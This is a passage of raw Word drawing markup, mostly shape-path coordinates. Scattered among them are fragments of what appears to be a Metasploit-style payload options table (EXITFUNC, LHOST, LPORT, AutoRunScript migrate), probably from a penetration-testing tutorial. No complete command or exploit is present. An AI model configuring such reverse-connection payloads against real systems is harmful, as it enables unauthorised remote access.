,7413,3986,7417,3986,7422,3986,7426,3986,7430,3986,7435,3986,7439,3986,7444,3986,7448,3986,7453,3986,7458,3986,7463,3986,7468,3986,7473,3986,7478,3986,7484,3986,7489,3986,7495,3986,7500,3986,7506,3986,7512,3986,7518,3986,7524,3986,7530,3986,7536,3986,7543,3986,7543,3986,7543,3986,7543,3986,7543,3986,7543,3986,7543,3986,7543,3986,7543,3986,7543,3986,7543,3986,7543,3986,7543,3986,7543,3986,7543,3986,7543,3986,7543,3986,7543,3986,7543,3986,7543,3986,7543,3985,7543,3985,7543,3985,7543,3985,7543,3985,7543,3985,7543,3985,7543,3985,7543,3984,7543,3984,7543,3984,7543,3984,7543,3984,7543,3983,7543,3983,7543,3983,7543,3983,7543,3982,7543,3982,7543,3982,7543,3981,7543,3981,7543,3981,7543,3980,7543,3980,7543,3980,7543,3979,7543,3979,7543,3978,7543,3978,7543,3977,7543,3977,7543,3976,7543,3975,7543,3975,7543,3974,7543,3973,7543,3973,7543,3972,7543,3971,7543,3971,7543,3970,7543,3969,7543,3968,7543,3967,7543,3966,7543,3966,7543,3965,7543,3964,7543,3963,7543,3962,7543,3961,7543,3959,7543,3958,7543,3957,7543,3956,7543,3955,7543,3953,7543,3952,7543,3951,7543,3950,7543,3948,7543,3947,7543,3945,7543,3944,7543,3942,7543,3941,7543,3939,7543,3937,7543,3936,7543,3934,7543,3932,7543,3931,7543,3929,7543,3927,7543,3925,7543,3923,7543,3921,7543,3919,7543,3917,7543,3915,7543,3913,7543,3910,7543,3908,7543,3906,7543,3904,7543,3901,7543,3899,7543,3896,7543,3894,7543,3891,7543,3889,7543,3886,7543,3883,7543,3880,7543,3878,7543,3875,7543,3872,7543,3869,7543,3866,7543,3866,7543,3866,7543,3866,7543,3866,7543,3866,7543,3866,7543,3866,7543,3866,7543,3866,7543,3866,7543,3866,7543,3866,7543,3866,7543,3866,7542,3866,7542,3866,7542,3866,7542,3866,7542,3866,7542,3866,7542,3866,7542,3866,7541,3866,7541,3866,7541,3866,7541,3866,7540,3866,7540,3866,7540,3866,7539,3866,7539,3866,7539,3866,7538,3866,7538,3866,7537,3866,7537,3866,7536,3866,7536,3866,7535,3866,7534,3866,7534,3866,7533,3866,7532,3866,7532,3866,7531,3866,7530,3866,7529,3866,7528,3866,7527,3866,7526,3866,7525,3866,7524,3866,7523,3866,7522,3866,7520,3866,7519,3866,7518,3866,7516,3866,7515,3866,7513,3866,7512,3866,7510,3866,7508,3866,7507,3866,7505,3866,7503,3866,7501,3866,7499,3866,7497,3866,7495,3866,7493,3866,7491,3866,7489,3866,7486,3866,7484,3866,7481,3866,7479,3866,7476,3866,7474,3866,7471,3866,7468,3866,7465,3866,7462,3866,7459,3866,7456,3866,7453,3866,7450,3866,7447,3866,7443,3866,7440,3866,7436,3866,7432,3866,7429,3866,7425,3866,7421,3866,7417,3866,7413,3866,7409,3866,7405,3866,7400,3866,7396,3866,7391,3866,7387,3866,7382,3866,7377,3866,7372,3866,7368,3866,7362,3866,7357,3866,7352,3866,7347,3866,7341,3866,7336,3866,7330,3866,7324,3866,7318,3866,7313,3866,7306,3866,7300,3866,7294,3866,7288e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:252.500pt;margin-top:363.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5050,7270" coordsize="130,270">
        <v:shape style="position:absolute;left:5050;top:7270;width:130;height:270" coordorigin="5050,7270" coordsize="130,270" path="m5067,7288l5067,7288,5067,7288,5067,7288,5067,7288,5067,7288,5067,7288,5067,7288,5067,7288,5067,7288,5067,7288,5067,7288,5067,7288,5067,7288,5067,7288,5067,7288,5067,7288,5067,7288,5067,7288,5067,7288,5067,7288,5067,7288,5067,7288,5067,7288,5067,7288,5068,7288,5068,7288,5068,7288,5068,7288,5068,7288,5068,7288,5068,7288,5069,7288,5069,7288,5069,7288,5069,7288,5070,7288,5070,7288,5070,7288,5070,7288,5071,7288,5071,7288,5071,7288,5072,7288,5072,7288,5073,7288,5073,7288,5073,7288,5074,7288,5074,7288,5075,7288,5075,7288,5076,7288,5077,7288,5077,7288,5078,7288,5078,7288,5079,7288,5080,7288,5080,7288,5081,7288,5082,7288,5083,7288,5084,7288,5084,7288,5085,7288,5086,7288,5087,7288,5088,7288,5089,7288,5090,7288,5091,7288,5092,7288,5093,7288,5094,7288,5095,7288,5097,7288,5098,7288,5099,7288,5100,7288,5102,7288,5103,7288,5104,7288,5106,7288,5107,7288,5109,7288,5110,7288,5112,7288,5113,7288,5115,7288,5117,7288,5118,7288,5120,7288,5122,7288,5124,7288,5126,7288,5128,7288,5130,7288,5132,7288,5134,7288,5136,7288,5138,7288,5140,7288,5142,7288,5144,7288,5147,7288,5149,7288,5151,7288,5154,7288,5156,7288,5159,7288,5161,7288,5164,7288,5167,7288,5169,7288,5172,7288,5175,7288,5178,7288,5181,7288,5184,7288,5187,7288,5187,7288,5187,7288,5187,7288,5187,7288,5187,7288,5187,7288,5187,7288,5187,7288,5187,7288,5187,7288,5187,7288,5187,7288,5187,7288,5187,7288,5187,7288,5187,7288,5187,7288,5187,7288,5187,7289,5187,7289,5187,7289,5187,7289,5187,7289,5187,7290,5187,7290,5187,7290,5187,7290,5187,7291,5187,7291,5187,7291,5187,7292,5187,7292,5187,7293,5187,7293,5187,7294,5187,7294,5187,7295,5187,7295,5187,7296,5187,7297,5187,7297,5187,7298,5187,7299,5187,7300,5187,7301,5187,7301,5187,7302,5187,7303,5187,7304,5187,7305,5187,7307,5187,7308,5187,7309,5187,7310,5187,7312,5187,7313,5187,7314,5187,7316,5187,7317,5187,7319,5187,7320,5187,7322,5187,7324,5187,7326,5187,7327,5187,7329,5187,7331,5187,7333,5187,7335,5187,7337,5187,7340,5187,7342,5187,7344,5187,7347,5187,7349,5187,7352,5187,7354,5187,7357,5187,7360,5187,7362,5187,7365,5187,7368,5187,7371,5187,7374,5187,7377,5187,7381,5187,7384,5187,7387,5187,7391,5187,7394,5187,7398,5187,7402,5187,7406,5187,7409,5187,7413,5187,7417,5187,7422,5187,7426,5187,7430,5187,7435,5187,7439,5187,7444,5187,7448,5187,7453,5187,7458,5187,7463,5187,7468,5187,7473,5187,7478,5187,7484,5187,7489,5187,7495,5187,7500,5187,7506,5187,7512,5187,7518,5187,7524,5187,7530,5187,7536,5187,7543,5187,7543,5187,7543,5187,7543,5187,7543,5187,7543,5187,7543,5187,7543,5187,7543,5187,7543,5187,7543,5187,7543,5187,7543,5186,7543,5186,7543,5186,7543,5186,7543,5186,7543,5186,7543,5186,7543,5186,7543,5186,7543,5186,7543,5186,7543,5186,7543,5186,7543,5185,7543,5185,7543,5185,7543,5185,7543,5185,7543,5185,7543,5184,7543,5184,7543,5184,7543,5184,7543,5184,7543,5183,7543,5183,7543,5183,7543,5182,7543,5182,7543,5182,7543,5181,7543,5181,7543,5181,7543,5180,7543,5180,7543,5179,7543,5179,7543,5178,7543,5178,7543,5177,7543,5177,7543,5176,7543,5175,7543,5175,7543,5174,7543,5173,7543,5173,7543,5172,7543,5171,7543,5170,7543,5170,7543,5169,7543,5168,7543,5167,7543,5166,7543,5165,7543,5164,7543,5163,7543,5162,7543,5161,7543,5160,7543,5159,7543,5158,7543,5157,7543,5155,7543,5154,7543,5153,7543,5151,7543,5150,7543,5149,7543,5147,7543,5146,7543,5144,7543,5143,7543,5141,7543,5140,7543,5138,7543,5136,7543,5135,7543,5133,7543,5131,7543,5129,7543,5127,7543,5126,7543,5124,7543,5122,7543,5120,7543,5117,7543,5115,7543,5113,7543,5111,7543,5109,7543,5106,7543,5104,7543,5102,7543,5099,7543,5097,7543,5094,7543,5092,7543,5089,7543,5087,7543,5084,7543,5081,7543,5078,7543,5075,7543,5073,7543,5070,7543,5067,7543,5067,7543,5067,7543,5067,7543,5067,7543,5067,7543,5067,7543,5067,7543,5067,7543,5067,7543,5067,7543,5067,7543,5067,7543,5067,7543,5067,7542,5067,7542,5067,7542,5067,7542,5067,7542,5067,7542,5067,7542,5067,7542,5067,7541,5067,7541,5067,7541,5067,7541,5067,7540,5067,7540,5067,7540,5067,7539,5067,7539,5067,7539,5067,7538,5067,7538,5067,7537,5067,7537,5067,7536,5067,7536,5067,7535,5067,7534,5067,7534,5067,7533,5067,7532,5067,7532,5067,7531,5067,7530,5067,7529,5067,7528,5067,7527,5067,7526,5067,7525,5067,7524,5067,7523,5067,7522,5067,7520,5067,7519,5067,7518,5067,7516,5067,7515,5067,7513,5067,7512,5067,7510,5067,7508,5067,7507,5067,7505,5067,7503,5067,7501,5067,7499,5067,7497,5067,7495,5067,7493,5067,7491,5067,7489,5067,7486,5067,7484,5067,7481,5067,7479,5067,7476,5067,7474,5067,7471,5067,7468,5067,7465,5067,7462,5067,7459,5067,7456,5067,7453,5067,7450,5067,7447,5067,7443,5067,7440,5067,7436,5067,7432,5067,7429,5067,7425,5067,7421,5067,7417,5067,7413,5067,7409,5067,7405,5067,7400,5067,7396,5067,7391,5067,7387,5067,7382,5067,7377,5067,7372,5067,7368,5067,7362,5067,7357,5067,7352,5067,7347,5067,7341,5067,7336,5067,7330,5067,7324,5067,7318,5067,7313,5067,7306,5067,7300,5067,7294,5067,7288e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:204.500pt;margin-top:382.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4090,7650" coordsize="130,250">
        <v:shape style="position:absolute;left:4090;top:7650;width:130;height:250" coordorigin="4090,7650" coordsize="130,250" path="m4106,7663l4106,7663,4106,7663,4106,7663,4106,7663,4106,7663,4106,7663,4106,7663,4106,7663,4106,7663,4106,7663,4106,7663,4106,7663,4106,7663,4106,7663,4106,7663,4106,7663,4106,7663,4106,7663,4106,7663,4107,7663,4107,7663,4107,7663,4107,7663,4107,7663,4107,7663,4107,7663,4107,7663,4107,7663,4108,7663,4108,7663,4108,7663,4108,7663,4108,7663,4109,7663,4109,7663,4109,7663,4109,7663,4110,7663,4110,7663,4110,7663,4111,7663,4111,7663,4111,7663,4112,7663,4112,7663,4113,7663,4113,7663,4113,7663,4114,7663,4114,7663,4115,7663,4116,7663,4116,7663,4117,7663,4117,7663,4118,7663,4119,7663,4119,7663,4120,7663,4121,7663,4121,7663,4122,7663,4123,7663,4124,7663,4125,7663,4126,7663,4127,7663,4127,7663,4128,7663,4129,7663,4131,7663,4132,7663,4133,7663,4134,7663,4135,7663,4136,7663,4137,7663,4139,7663,4140,7663,4141,7663,4143,7663,4144,7663,4145,7663,4147,7663,4148,7663,4150,7663,4151,7663,4153,7663,4155,7663,4156,7663,4158,7663,4160,7663,4162,7663,4163,7663,4165,7663,4167,7663,4169,7663,4171,7663,4173,7663,4175,7663,4177,7663,4179,7663,4182,7663,4184,7663,4186,7663,4189,7663,4191,7663,4193,7663,4196,7663,4198,7663,4201,7663,4204,7663,4206,7663,4209,7663,4212,7663,4214,7663,4217,7663,4220,7663,4223,7663,4226,7663,4226,7663,4226,7663,4226,7663,4226,7663,4226,7663,4226,7663,4226,7663,4226,7663,4226,7663,4226,7663,4226,7663,4226,7663,4226,7663,4226,7663,4226,7663,4226,7663,4226,7663,4226,7664,4226,7664,4226,7664,4226,7664,4226,7664,4226,7664,4226,7665,4226,7665,4226,7665,4226,7666,4226,7666,4226,7666,4226,7667,4226,7667,4226,7667,4226,7668,4226,7668,4226,7669,4226,7669,4226,7670,4226,7671,4226,7671,4226,7672,4226,7673,4226,7673,4226,7674,4226,7675,4226,7676,4226,7677,4226,7678,4226,7679,4226,7680,4226,7681,4226,7682,4226,7683,4226,7684,4226,7685,4226,7687,4226,7688,4226,7689,4226,7691,4226,7692,4226,7694,4226,7696,4226,7697,4226,7699,4226,7701,4226,7703,4226,7704,4226,7706,4226,7708,4226,7710,4226,7713,4226,7715,4226,7717,4226,7719,4226,7722,4226,7724,4226,7727,4226,7729,4226,7732,4226,7735,4226,7738,4226,7740,4226,7743,4226,7746,4226,7749,4226,7753,4226,7756,4226,7759,4226,7763,4226,7766,4226,7770,4226,7773,4226,7777,4226,7781,4226,7785,4226,7789,4226,7793,4226,7797,4226,7801,4226,7805,4226,7810,4226,7814,4226,7819,4226,7824,4226,7828,4226,7833,4226,7838,4226,7843,4226,7848,4226,7854,4226,7859,4226,7864,4226,7870,4226,7876,4226,7881,4226,7887,4226,7893,4226,7899,4226,7905,4226,7912,4226,7918,4226,7918,4226,7918,4226,7918,4226,7918,4226,7918,4226,7918,4226,7918,4226,7918,4226,7918,4226,7918,4226,7918,4226,7918,4226,7918,4226,7918,4226,7918,4226,7918,4226,7918,4226,7918,4226,7918,4226,7918,4226,7918,4225,7918,4225,7918,4225,7918,4225,7918,4225,7918,4225,7918,4225,7918,4225,7918,4224,7918,4224,7918,4224,7918,4224,7918,4224,7918,4223,7918,4223,7918,4223,7918,4223,7918,4222,7918,4222,7918,4222,7918,4221,7918,4221,7918,4220,7918,4220,7918,4220,7918,4219,7918,4219,7918,4218,7918,4218,7918,4217,7918,4217,7918,4216,7918,4216,7918,4215,7918,4214,7918,4214,7918,4213,7918,4212,7918,4211,7918,4211,7918,4210,7918,4209,7918,4208,7918,4207,7918,4207,7918,4206,7918,4205,7918,4204,7918,4203,7918,4202,7918,4201,7918,4200,7918,4198,7918,4197,7918,4196,7918,4195,7918,4194,7918,4192,7918,4191,7918,4190,7918,4188,7918,4187,7918,4185,7918,4184,7918,4182,7918,4181,7918,4179,7918,4178,7918,4176,7918,4174,7918,4172,7918,4171,7918,4169,7918,4167,7918,4165,7918,4163,7918,4161,7918,4159,7918,4157,7918,4155,7918,4153,7918,4151,7918,4148,7918,4146,7918,4144,7918,4141,7918,4139,7918,4136,7918,4134,7918,4131,7918,4129,7918,4126,7918,4123,7918,4121,7918,4118,7918,4115,7918,4112,7918,4109,7918,4106,7918,4106,7918,4106,7918,4106,7918,4106,7918,4106,7918,4106,7918,4106,7918,4106,7918,4106,7918,4106,7918,4106,7918,4106,7918,4106,7918,4106,7918,4106,7918,4106,7917,4106,7917,4106,7917,4106,7917,4106,7917,4106,7917,4106,7917,4106,7916,4106,7916,4106,7916,4106,7916,4106,7915,4106,7915,4106,7915,4106,7914,4106,7914,4106,7913,4106,7913,4106,7913,4106,7912,4106,7911,4106,7911,4106,7910,4106,7910,4106,7909,4106,7908,4106,7908,4106,7907,4106,7906,4106,7905,4106,7904,4106,7903,4106,7902,4106,7901,4106,7900,4106,7899,4106,7898,4106,7897,4106,7895,4106,7894,4106,7893,4106,7891,4106,7890,4106,7888,4106,7887,4106,7885,4106,7884,4106,7882,4106,7880,4106,7878,4106,7876,4106,7874,4106,7872,4106,7870,4106,7868,4106,7866,4106,7864,4106,7861,4106,7859,4106,7857,4106,7854,4106,7852,4106,7849,4106,7846,4106,7843,4106,7840,4106,7838,4106,7835,4106,7831,4106,7828,4106,7825,4106,7822,4106,7818,4106,7815,4106,7811,4106,7808,4106,7804,4106,7800,4106,7796,4106,7792,4106,7788,4106,7784,4106,7780,4106,7775,4106,7771,4106,7767,4106,7762,4106,7757,4106,7753,4106,7748,4106,7743,4106,7738,4106,7733,4106,7727,4106,7722,4106,7716,4106,7711,4106,7705,4106,7700,4106,7694,4106,7688,4106,7682,4106,7676,4106,7669,4106,7663e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:264.500pt;margin-top:382.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5290,7650" coordsize="130,250">
        <v:shape style="position:absolute;left:5290;top:7650;width:130;height:250" coordorigin="5290,7650" coordsize="130,250" path="m5307,7663l5307,7663,5307,7663,5307,7663,5307,7663,5307,7663,5307,7663,5307,7663,5307,7663,5307,7663,5307,7663,5307,7663,5307,7663,5307,7663,5307,7663,5307,7663,5307,7663,5307,7663,5307,7663,5307,7663,5307,7663,5307,7663,5307,7663,5307,7663,5308,7663,5308,7663,5308,7663,5308,7663,5308,7663,5308,7663,5308,7663,5309,7663,5309,7663,5309,7663,5309,7663,5309,7663,5310,7663,5310,7663,5310,7663,5311,7663,5311,7663,5311,7663,5312,7663,5312,7663,5312,7663,5313,7663,5313,7663,5314,7663,5314,7663,5315,7663,5315,7663,5316,7663,5316,7663,5317,7663,5317,7663,5318,7663,5319,7663,5319,7663,5320,7663,5321,7663,5321,7663,5322,7663,5323,7663,5324,7663,5324,7663,5325,7663,5326,7663,5327,7663,5328,7663,5329,7663,5330,7663,5331,7663,5332,7663,5333,7663,5334,7663,5336,7663,5337,7663,5338,7663,5339,7663,5340,7663,5342,7663,5343,7663,5345,7663,5346,7663,5347,7663,5349,7663,5350,7663,5352,7663,5354,7663,5355,7663,5357,7663,5359,7663,5360,7663,5362,7663,5364,7663,5366,7663,5368,7663,5370,7663,5372,7663,5374,7663,5376,7663,5378,7663,5380,7663,5382,7663,5385,7663,5387,7663,5389,7663,5392,7663,5394,7663,5396,7663,5399,7663,5402,7663,5404,7663,5407,7663,5409,7663,5412,7663,5415,7663,5418,7663,5421,7663,5424,7663,5427,7663,5427,7663,5427,7663,5427,7663,5427,7663,5427,7663,5427,7663,5427,7663,5427,7663,5427,7663,5427,7663,5427,7663,5427,7663,5427,7663,5427,7663,5427,7663,5427,7663,5427,7663,5427,7664,5427,7664,5427,7664,5427,7664,5427,7664,5427,7664,5427,7665,5427,7665,5427,7665,5427,7666,5427,7666,5427,7666,5427,7667,5427,7667,5427,7667,5427,7668,5427,7668,5427,7669,5427,7669,5427,7670,5427,7671,5427,7671,5427,7672,5427,7673,5427,7673,5427,7674,5427,7675,5427,7676,5427,7677,5427,7678,5427,7679,5427,7680,5427,7681,5427,7682,5427,7683,5427,7684,5427,7685,5427,7687,5427,7688,5427,7689,5427,7691,5427,7692,5427,7694,5427,7696,5427,7697,5427,7699,5427,7701,5427,7703,5427,7704,5427,7706,5427,7708,5427,7710,5427,7713,5427,7715,5427,7717,5427,7719,5427,7722,5427,7724,5427,7727,5427,7729,5427,7732,5427,7735,5427,7738,5427,7740,5427,7743,5427,7746,5427,7749,5427,7753,5427,7756,5427,7759,5427,7763,5427,7766,5427,7770,5427,7773,5427,7777,5427,7781,5427,7785,5427,7789,5427,7793,5427,7797,5427,7801,5427,7805,5427,7810,5427,7814,5427,7819,5427,7824,5427,7828,5427,7833,5427,7838,5427,7843,5427,7848,5427,7854,5427,7859,5427,7864,5427,7870,5427,7876,5427,7881,5427,7887,5427,7893,5427,7899,5427,7905,5427,7912,5427,7918,5427,7918,5427,7918,5427,7918,5427,7918,5427,7918,5427,7918,5427,7918,5427,7918,5427,7918,5427,7918,5427,7918,5427,7918,5427,7918,5427,7918,5427,7918,5426,7918,5426,7918,5426,7918,5426,7918,5426,7918,5426,7918,5426,7918,5426,7918,5426,7918,5426,7918,5426,7918,5425,7918,5425,7918,5425,7918,5425,7918,5425,7918,5425,7918,5424,7918,5424,7918,5424,7918,5424,7918,5423,7918,5423,7918,5423,7918,5423,7918,5422,7918,5422,7918,5421,7918,5421,7918,5421,7918,5420,7918,5420,7918,5419,7918,5419,7918,5418,7918,5418,7918,5417,7918,5417,7918,5416,7918,5416,7918,5415,7918,5414,7918,5414,7918,5413,7918,5412,7918,5411,7918,5411,7918,5410,7918,5409,7918,5408,7918,5407,7918,5406,7918,5405,7918,5404,7918,5403,7918,5402,7918,5401,7918,5400,7918,5399,7918,5398,7918,5397,7918,5395,7918,5394,7918,5393,7918,5392,7918,5390,7918,5389,7918,5387,7918,5386,7918,5385,7918,5383,7918,5381,7918,5380,7918,5378,7918,5377,7918,5375,7918,5373,7918,5371,7918,5369,7918,5368,7918,5366,7918,5364,7918,5362,7918,5360,7918,5358,7918,5355,7918,5353,7918,5351,7918,5349,7918,5347,7918,5344,7918,5342,7918,5339,7918,5337,7918,5334,7918,5332,7918,5329,7918,5327,7918,5324,7918,5321,7918,5318,7918,5316,7918,5313,7918,5310,7918,5307,7918,5307,7918,5307,7918,5307,7918,5307,7918,5307,7918,5307,7918,5307,7918,5307,7918,5307,7918,5307,7918,5307,7918,5307,7918,5307,7918,5307,7918,5307,7918,5307,7917,5307,7917,5307,7917,5307,7917,5307,7917,5307,7917,5307,7917,5307,7916,5307,7916,5307,7916,5307,7916,5307,7915,5307,7915,5307,7915,5307,7914,5307,7914,5307,7913,5307,7913,5307,7913,5307,7912,5307,7911,5307,7911,5307,7910,5307,7910,5307,7909,5307,7908,5307,7908,5307,7907,5307,7906,5307,7905,5307,7904,5307,7903,5307,7902,5307,7901,5307,7900,5307,7899,5307,7898,5307,7897,5307,7895,5307,7894,5307,7893,5307,7891,5307,7890,5307,7888,5307,7887,5307,7885,5307,7884,5307,7882,5307,7880,5307,7878,5307,7876,5307,7874,5307,7872,5307,7870,5307,7868,5307,7866,5307,7864,5307,7861,5307,7859,5307,7857,5307,7854,5307,7852,5307,7849,5307,7846,5307,7843,5307,7840,5307,7838,5307,7835,5307,7831,5307,7828,5307,7825,5307,7822,5307,7818,5307,7815,5307,7811,5307,7808,5307,7804,5307,7800,5307,7796,5307,7792,5307,7788,5307,7784,5307,7780,5307,7775,5307,7771,5307,7767,5307,7762,5307,7757,5307,7753,5307,7748,5307,7743,5307,7738,5307,7733,5307,7727,5307,7722,5307,7716,5307,7711,5307,7705,5307,7700,5307,7694,5307,7688,5307,7682,5307,7676,5307,7669,5307,7663e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:436.800pt;width:467.400pt;height:279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Setting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Required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Description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EXITFUNC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Exit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technique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Accepted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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''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thread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proce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ss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none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)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LHOST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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.4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address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interface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may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ed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626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LPORT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yes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listen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25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942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target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Name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582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Wildcard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Target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AutoRunScript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migrate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AutoRunScript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migrate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87.400pt;width:7.200pt;height:6.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId10" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:48.500pt;width:449.500pt;height:34.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,690">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:690" coordorigin="1490,970" coordsize="8990,6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1,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1003,10484,1003,10484,1004,10484,1004,10484,1005,10484,1006,10484,1007,10484,1007,10484,1008,10484,1009,10484,1010,10484,1011,10484,1013,10484,1014,10484,1015,10484,1017,10484,1018,10484,1020,10484,1021,10484,1023,10484,1025,10484,1027,10484,1029,10484,1031,10484,1034,10484,1036,10484,1039,10484,1041,10484,1044,10484,1047,10484,1050,10484,1053,10484,1056,10484,1059,10484,1063,10484,1066,10484,1070,10484,1074,10484,1078,10484,1082,10484,1086,10484,1090,10484,1095,10484,1100,10484,1105,10484,1110,10484,1115,10484,1120,10484,1126,10484,1131,10484,1137,10484,1143,10484,1149,10484,1155,10484,1162,10484,1169,10484,1175,10484,1182,10484,1190,10484,1197,10484,1205,10484,1212,10484,1220,10484,1229,10484,1237,10484,1246,10484,1254,10484,1263,10484,1273,10484,1282,10484,1292,10484,1302,10484,1312,10484,1322,10484,1332,10484,1343,10484,1354,10484,1365,10484,1377,10484,1388,10484,1400,10484,1412,10484,1425,10484,1437,10484,1450,10484,1463,10484,1477,10484,1490,10484,1504,10484,1518,10484,1533,10484,1548,10484,1563,10484,1578,10484,1593,10484,1609,10484,1625,10484,1641,10484,1658,10484,1675,10484,1675,10484,1675,10484,1675,10484,1675,10484,1675,10484,1675,10483,1675,10482,1675,10482,1675,10480,1675,10479,1675,10477,1675,10475,1675,10473,1675,10470,1675,10466,1675,10462,1675,10458,1675,10453,1675,10448,1675,10442,1675,10435,1675,10428,1675,10419,1675,10411,1675,10401,1675,10391,1675,10379,1675,10367,1675,10354,1675,10340,1675,10326,1675,10310,1675,10293,1675,10275,1675,10256,1675,10236,1675,10215,1675,10192,1675,10168,1675,10143,1675,10117,1675,10090,1675,10061,1675,10031,1675,9999,1675,9966,1675,9931,1675,9895,1675,9858,1675,9819,1675,9778,1675,9735,1675,9691,1675,9646,1675,9598,1675,9549,1675,9498,1675,9445,1675,9391,1675,9334,1675,9275,1675,9215,1675,9153,1675,9088,1675,9022,1675,8953,1675,8883,1675,8810,1675,8735,1675,8658,1675,8578,1675,8497,1675,8413,1675,8326,1675,8238,1675,8146,1675,8053,1675,7957,1675,7859,1675,7758,1675,7654,1675,7548,1675,7439,1675,7328,1675,7214,1675,7097,1675,6977,1675,6855,1675,6730,1675,6602,1675,6471,1675,6337,1675,6201,1675,6061,1675,5918,1675,5773,1675,5624,1675,5472,1675,5317,1675,5159,1675,4997,1675,4833,1675,4665,1675,4494,1675,4319,1675,4141,1675,3960,1675,3776,1675,3587,1675,3396,1675,3201,1675,3002,1675,2800,1675,2594,1675,2385,1675,2172,1675,1955,1675,1734,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1674,1510,1674,1510,1674,1510,1674,1510,1674,1510,1673,1510,1673,1510,1673,1510,1673,1510,1672,1510,1672,1510,1671,1510,1671,1510,1670,1510,1669,1510,1669,1510,1668,1510,1667,1510,1666,1510,1665,1510,1664,1510,1663,1510,1662,1510,1660,1510,1659,1510,1658,1510,1656,1510,1655,1510,1653,1510,1651,1510,1649,1510,1647,1510,1645,1510,1643,1510,1641,1510,1638,1510,1636,1510,1633,1510,1631,1510,1628,1510,1625,1510,1622,1510,1618,1510,1615,1510,1612,1510,1608,1510,1604,1510,1601,1510,1597,1510,1593,1510,1588,1510,1584,1510,1579,1510,1575,1510,1570,1510,1565,1510,1560,1510,1554,1510,1549,1510,1543,1510,1537,1510,1531,1510,1525,1510,1519,1510,1512,1510,1506,1510,1499,1510,1492,1510,1485,1510,1477,1510,1470,1510,1462,1510,1454,1510,1446,1510,1437,1510,1429,1510,1420,1510,1411,1510,1402,1510,1392,1510,1383,1510,1373,1510,1363,1510,1352,1510,1342,1510,1331,1510,1320,1510,1309,1510,1298,1510,1286,1510,1274,1510,1262,1510,1250,1510,1237,1510,1224,1510,1211,1510,1198,1510,1184,1510,1170,1510,1156,1510,1141,1510,1127,1510,1112,1510,1097,1510,1081,1510,1065,1510,1049,1510,1033,1510,1016,1510,1000e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:48.600pt;width:445.800pt;height:35.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId11" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:519.500pt;margin-top:104.500pt;width:0.500pt;height:296.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,2090" coordsize="10,5930">
        <v:shape style="position:absolute;left:10390;top:2090;width:10;height:5930" coordorigin="10390,2090" coordsize="10,5930" path="m10402,2095l10402,2095,10402,2095,10402,2095,10402,2095,10402,2095,10402,2095,10402,2096,10402,2096,10402,2097,10402,2098,10402,2099,10402,2100,10402,2101,10402,2103,10402,2105,10402,2107,10402,2109,10402,2112,10402,2116,10402,2119,10402,2123,10402,2128,10402,2133,10402,2138,10402,2144,10402,2150,10402,2157,10402,2164,10402,2172,10402,2181,10402,2190,10402,2200,10402,2210,10402,2221,10402,2233,10402,2246,10402,2259,10402,2273,10402,2288,10402,2304,10402,2320,10402,2338,10402,2356,10402,2375,10402,2395,10402,2416,10402,2437,10402,2460,10402,2484,10402,2509,10402,2535,10402,2562,10402,2590,10402,2619,10402,2649,10402,2680,10402,2713,10402,2747,10402,2781,10402,2818,10402,2855,10402,2894,10402,2933,10402,2975,10402,3017,10402,3061,10402,3106,10402,3153,10402,3201,10402,3251,10402,3302,10402,3354,10402,3408,10402,3464,10402,3521,10402,3579,10402,3639,10402,3701,10402,3764,10402,3829,10402,3896,10402,3965,10402,4035,10402,4106,10402,4180,10402,4255,10402,4333,10402,4412,10402,4492,10402,4575,10402,4660,10402,4746,10402,4834,10402,4925,10402,5017,10402,5111,10402,5207,10402,5306,10402,5406,10402,5508,10402,5613,10402,5719,10402,5828,10402,5939,10402,6052,10402,6167,10402,6285,10402,6404,10402,6526,10402,6651,10402,6777,10402,6906,10402,7037,10402,7171,10402,7307,10402,7445,10402,7586,10402,7729,10402,7875,10402,8023e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:103.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2070" coordsize="8990,390">
